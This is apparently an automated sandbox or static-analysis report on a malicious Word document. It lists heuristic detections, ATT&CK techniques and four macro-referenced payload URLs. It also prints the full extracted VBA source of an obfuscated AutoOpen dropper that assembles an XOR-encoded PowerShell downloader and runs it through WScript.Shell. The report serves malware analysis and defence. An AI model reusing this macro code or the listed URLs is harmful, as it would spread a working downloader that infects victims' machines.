MALICIOUS
Risk Score: 350
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of WScript.Shell and CreateObject, indicating an attempt to download and execute a secondary payload. The presence of these calls strongly suggests a dropper or downloader functionality.
Heuristics (11)
- ClamAV: Doc.Dropper.Agent-6599063-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6599063-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script (shown with its neighbouring statements):
    JPUnS = 82612 * iirfr / UQEuI + AdcTnq - 67285 * dctOi / zJinwR * ShUQHi / biVjl - Hkjwhz
    iwGIOiRwMkL = lkiSMACw + CreateObject("Wscript.shell").Run(jHNhwM + Chr(vbKeyP) + DQUHLNp + Chr(vbKeyO) + RdEBTKYSE + zBqAYAw, 353871513 - 353871513)
    zzhvK = 97054 * iLQdP / QzOtB + irTYFs - 10022 * JEUjC / DrQiFt * mQNYud / ZbqIuz - OjYcD
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: the same CreateObject("Wscript.shell").Run(...) statement quoted under the WScript.Shell finding above.
- Payload URL decoded from an encoded PowerShell loader, 4 URLs (high, OLE_VBA_ENCODED_PS_DROPPER_URL): A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array, decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; they are surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
    Attribute VB_Name = "FEEBoIpEBPl"
    Sub AutoOpen()
    On Error Resume Next
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    - http://www.chixg.com/hciyoer/U/ (referenced by macro)
    - http://baute.org/64/ (referenced by macro)
    - http://redwire.us/wordprss/hSbhW/ (referenced by macro)
    - http://www.wheelhousela.com/pBwINgH8/ (referenced by macro)
    - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7466 bytes |
SHA-256: 292c24fbb3ab44c643b4ec187bc19907d3381ab81b638e81cff7b38e380cccbc
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 112 of 200 identifiers look randomly generated (e.g. 'OpalTzKpkJq'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "HiKSikzURWz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FEEBoIpEBPl"
Sub AutoOpen()
On Error Resume Next
VGZII = (jfXHGQ / amHccf + (wdzuF - JRpKpC + ftGlVp + 13711 * Wdjzqt * CHUju))
XsGiC = (jPpNR / pTjfV + (nYVZA - vPGoO + qJHGHB + 386 * TfXah * RwAZo))
Awnki = (jYzpz / Gbfhw + (rAMrFG - HwdHz + NLdwA + 43293 * ArFGs * pPwIaj))
NKrYZ = (VEGHsk / XwJMu + (KbCUVq - fYVSq + wwSpzX + 6090 * PDDBRn * EfQNz))
mNtWz = (sqjnDv / HWIvi + (ifOnH - uskwz + jzrvc + 31863 * HJJJXf * cZZtJA))
pqLpV = 64814 * GwjnR / lcEHJ + qMvYwT - 8644 * BasEF / WIGHzd * lXSTPk / BiAYH - IFuRM
vBrZwF (KRXCuoG + NzJbCCwTIE + liPssr)
pQPjC = 56182 * njwOP / XLdOW + VGhBv - 53967 * qlicj / HiWPJc * oHmSR / zcQPz - lhMwIO
RiQjE = 59487 * ZhdVzH / wFpcEj + rBXZUz - 61881 * RNpudM / VrOoh * fYIDR / ZCPSMd - actHkh
EmmhF = 14060 * jIXAv / mVONU + jrioa - 44094 * zwwuiN / pXNBa * LDUoEP / isPTw - ticZwM
End Sub
Function vBrZwF(RdEBTKYSE)
On Error Resume Next
RiSXR = 32088 * XYbArp / TiiEb + WlRdXI - 27033 * nIuzH / JiJBi * QjmNq / PUvTd - dFnjQ
VJPmN = 78043 * uiOHMn / CjXqjK + EFjdw - 12432 * WNzPp / LCoha * cZziI / LprwE - OBHQEj
zICrkP = 63971 * jSFkY / WNKmwD + RttETf - 65841 * CkcRT / ZKYzX * nXwOLv / pPuBi - DiPJm
OnGlBA = 7053 * qvEhtB / DzrzTn + NfsXs - 80107 * aaQPCc / UHLHL * wIkkk / LDHmaj - zabtdI
kzihi = 56271 * EawCm / bXztwi + XisEHi - 89105 * QTKBl / mhEpOl * qatNIP / pDoSi - tGGiZz
JPUnS = 82612 * iirfr / UQEuI + AdcTnq - 67285 * dctOi / zJinwR * ShUQHi / biVjl - Hkjwhz
iwGIOiRwMkL = lkiSMACw + CreateObject("Wscript.shell").Run(jHNhwM + Chr(vbKeyP) + DQUHLNp + Chr(vbKeyO) + RdEBTKYSE + zBqAYAw, 353871513 - 353871513)
zzhvK = 97054 * iLQdP / QzOtB + irTYFs - 10022 * JEUjC / DrQiFt * mQNYud / ZbqIuz - OjYcD
kvCpcz = 84313 * KhRzq / ivIDjH + fuGNd - 82301 * NdmGzh / WfinJ * NQBEiu / YoYtBp - FBvcz
pziqj = 51808 * TZjjnH / wbGAKO + khOMpE - 44427 * LrFBov / lWrTBL * uJUmDT / ZYSpfF - QirWF
End Function
Function KRXCuoG()
On Error Resume Next
tziYS = (BfzHkb + 22700)
shdMR = vHAnP / 37979 + 92804 / uAOjY / 88592 / NJLPQ / zzQME * znJqw
fplab = (JfwHEr + 96171)
piGKpYD = "wers" + "hell " + " " + " -J" + "oIn" + Chr(40) + "'40K" + "97j8" + "8j71," + "49t9" + "8%105&123" + "!33,99" + "t110o102%" + "105K11"
VzrdqA = (sjkWuZ + 72885)
wNlKS = (tFZni + 33265)
kVpuY = (wJCJl + 46111)
XBJVqvp = "1K120~44," + "66t105%1" + "20,34" + "t91~105K1" + "10,79~9" + "6o101j105" + "t98j120&5"
kTAzc = (VfSvXG + 8208)
nXqpA = (RKHMLM + 25088)
tEAmT = (tNvzii + 25397)
FNwjjWlKU = "5o40~70" + ",78t12" + "3&49," + "43j1" + "00%120" + "%120@" + "124K54@3" + "5@35" + "t123!1" + "23!123o"
PNmEd = (SuMdKE + 95602)
jRinVk = (jWHFvS + 50642)
tHSfQZ = (LMjamO + 74229)
IDNuczV = "34~1" + "11o100o10" + "1%116t1" + "07&34" + "o111%99~" + "97K35K1" + "00t11" + "1K10"
BFVqS = (CHsKO + 30965)
thTuDY = (EanPvF + 33860)
vzatR = (rJOwwb + 24603)
LwnPNhDs = "1o117K" + "99t105" + "&126" + "!35&89@3" + "5%76o" + "100~120t" + "120K124,"
BoFPfB = (FKZOXa + 42978)
mwoiZ = (qRjkL + 61490)
BXEwH = (bzYhuF + 75042)
oPbfXaTmto = "54@35o35t" + "110@109o" + "121!120" + ",105" + "K34%99%1" + "26~107%35" + "!58!5" + "6,35j"
kjXFLD = (kvWjX + 72994)
VVJKQR = (CtDRoL + 26621)
ucmCo = (aUfiUw + 25039)
sGHvS = "76!10" + "0@120" + "K120,124@" + "54~35&35t" + "126K105t" + "104t1" + "23,101"
KRXCuoG = piGKpYD + XBJVqvp + FNwjjWlKU + IDNuczV + LwnPNhDs + oPbfXaTmto + sGHvS
JjPWR = (PHRRzF + 37765)
MNNVr = (flkXhK + 90371)
ifvVR = (JTujz + 20784)
End Function
Function NzJbCCwTIE()
On Error Resume Next
MOwQzY = (UuLwC + 92047)
wzAXBI = (GPaKF + 28429)
sTdVj = (WEVAPS + 60970)
fTomO = "o126,105~" + "34%121K12" + "7t35%123" + "&99j126" + ",104%124" + "&126t12" + "7&127~" + "35&10" + "0&95K"
XZRXdr = (njoDp + 36544)
RoLMc = (PwndY + 61593)
tizHic = (uBiuH + 82118)
adowF = "110&1" + "00&91j35K" + "76%100!1" + "20!12" + "0K124@" + "54~35,35,"
GzKDs = (ljaLD + 79798)
OaSrRv = (quEQa + 61144)
QKREm = (rYWGv + 77469)
ZHaYO = "61K62o62%" + "34j6" + "1o57,57" + "j34@61" + "@53&59" + "%34,61%" + "62!3" + "5j123~105" + ",110~35~" + "89@88%77"
pwOPqs = (tIzrc + 96769)
bhfNGD = (KXVXz + 7005)
npEMwd = (JsjAXR + 89033)
ZdbHKhlMIo = "&35K76~10" + "0~120&1" + "20%124" + ",54K35j35" + "j123,123t" + "123~34~1" + "23j100" + "%105&105t" + "96o100@99" + "&121K1" + "27&10"
NEBnaQ = (viGwlU + 98944)
cnEpKw = (VzGLJR + 78836)
MjmRih = (IjMFd + 92805)
UhNVLYj = "5o96K109~" + "34K111,9" + "9~97,35,1" + "24o7" + "8K123t6" + "9%66o10" + "7&68!5" + "2o35o43,3" + "4t95j124"
fVzMX = (jfiIw + 98963)
DhaUz = (PFKPCE + 59108)
cFUuZ = (CKVrYz + 32388)
PwBizBintpA = "!96!" + "101%" + "120~36,4" + "3&76," + "43&37j" + "55!40@11" + "8!125" + "@66@4" + "4~49o44~" + "43o56~61!" + "59!43@55"
NzJbCCwTIE = fTomO + adowF + ZHaYO + ZdbHKhlMIo + UhNVLYj + PwBizBintpA
aMwaoD = (zTMiq + 91882)
wqYYLR = (FBbquN + 10338)
LjwzfO = (pRpjd + 78341)
End Function
Function liPssr()
On Error Resume Next
OPjPp = (vuKWW + 64030)
uHSKwn = (vMAUj + 47955)
Giinm = (bPuTY + 3676)
woFaM = "!40t99t85" + "~70o" + "49@40!105" + "K98@122j5" + "4%120t105" + ",97t124@3" + "9&43%" + "80!43" + "!39t40j" + "118j125" + "%66j39,43"
dGwMI = (kfwPw + 25806)
dizvG = (iSqki + 90183)
mDiMw = (uOEjdl + 58983)
wAVhLL = "!34,1" + "05t1" + "16&105&4" + "3@55&106%" + "99&126" + "j105&109"
HHPNl = (WHjBc + 32406)
XGYiB = (lfrPz + 46011)
nnZwWK = (pALuYZ + 77740)
KiBhjRHwiF = "&111K1" + "00%36o40%" + "101j88@10" + "1@44@101" + "~98&" + "44%40o70j" + "78~123&"
jswut = (EOUwkC + 40622)
lmqwoX = (zFwto + 72391)
WvdFbf = (XkAkm + 32156)
KNfJwNZYpb = "37o119,12" + "0o126o117" + "o119" + "t40~97," + "88!71" + "j34@72" + "@99K" + "123%"
IahVZ = (vVbiL + 74732)
BIWYz = (ALCvAk + 53077)
CqOBH = (RNBwv + 6290)
ArDSDkpFRL = "98~96,99@" + "109%104" + "!74t1" + "01,96j105" + "t36j40@10" + "1&88" + "@101!" + "32,44K4" + "0!99K" + "85t70"
raLCOj = (zWAFmw + 65972)
QUqBtI = (qLiij + 90100)
EoGXd = (RrlUab + 49992)
Xziizk = "@37%55" + "o95%" + "120~1" + "09,126j1" + "20,33o9" + "2j126,9" + "9@111j" + "105K1"
Sqzju = (VnzhoL + 11786)
vzmisq = (UHhqIZ + 66972)
bRiaw = (TfUNfH + 35393)
HBCNudNVCR = "27,127!" + "44t40,99j" + "85&70K55&" + "110t126~1" + "05~1" + "09!103,55" + "%113" + "&111!" + "109!120!1" + "11o1"
nTBln = (PKwpSt + 34243)
VYYNO = (ZnEVj + 23772)
URQMjO = (pqqZi + 87067)
PsPCjqj = "00t119!11" + "3~113'.S" + "pliT" + Chr(40) + " '%," + "tKo&!j~" + "@' " + Chr(41) + "|foR"
Vauqw = (KEMazj + 352)
imizhN = (WhUFw + 84593)
ihwiV = (lTDjvh + 25462)
kjqcuKi = "EACh-" + "oBJeCT{" + " [ChAR" + "]" + Chr(40) + "$_" + " -BXOr" + " 0x0c " + Chr(41) + " } " + Chr(41) + "| ." + Chr(40) + " " + "$SHELlid" + "[1]" + Chr(43) + "$sH" + "ELLiD[13" + "]" + Chr(43) + "'x'" + Chr(41) + " "
liPssr = woFaM + wAVhLL + KiBhjRHwiF + KNfJwNZYpb + ArDSDkpFRL + Xziizk + HBCNudNVCR + PsPCjqj + kjqcuKi
VYloz = (jWDFv + 25243)
mjjqm = (fOrkX + 34761)
LjuDAz = (AHaPAL + 8924)
End Function
Attribute VB_Name = "OpalTzKpkJq"